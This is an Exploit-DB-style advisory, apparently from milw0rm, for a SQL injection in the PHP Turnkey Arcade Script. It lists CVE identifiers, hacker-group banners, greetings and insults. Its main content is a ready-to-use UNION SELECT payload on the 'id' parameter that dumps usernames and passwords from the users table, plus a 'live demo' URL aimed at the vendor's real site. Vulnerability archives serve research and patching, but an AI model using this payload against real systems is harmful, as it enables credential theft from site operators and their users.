Turnkey Arcade Script - SQL Injection (2)
Author: Red-D3v1L
type: webapps
platform: php
port:
date_added: 2009-08-24
date_updated: 2017-01-03
verified: 1
codes: OSVDB-50315;CVE-2009-3973;CVE-2008-5629
tags:
aliases:
screenshot_url:
application_url:
==============================================================================
## Hackteach.OrG ##
/ ___ )( __ )/ ___ )
\/ ) || ( ) |\/ ) |
/ )| | / | / )
/ / | (/ /) | / /
/ / | / | | / /
/ (_/\| (__) | / (_/\
(_______/(_______)(_______/
==============================================================================
[»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
[»] Arcad site Script <== Remote SQL Injection Vulnerability
==============================================================================
[»] my home: [ Hackteach.org ]
[»] Script: [ Arcad site Script ]
[»] Language: [ PHP ]
[»] Download: [ http://www.turnkeyarcade.com/ ]
[»] Founder: [ Red-D3v1L < php-c0de@hotmail.com > ]
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]
########################################################################
===[ Exploit SQL ]===
[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
Author: Red-D3v1L <-
###########################################################################
# milw0rm.com [2009-08-25]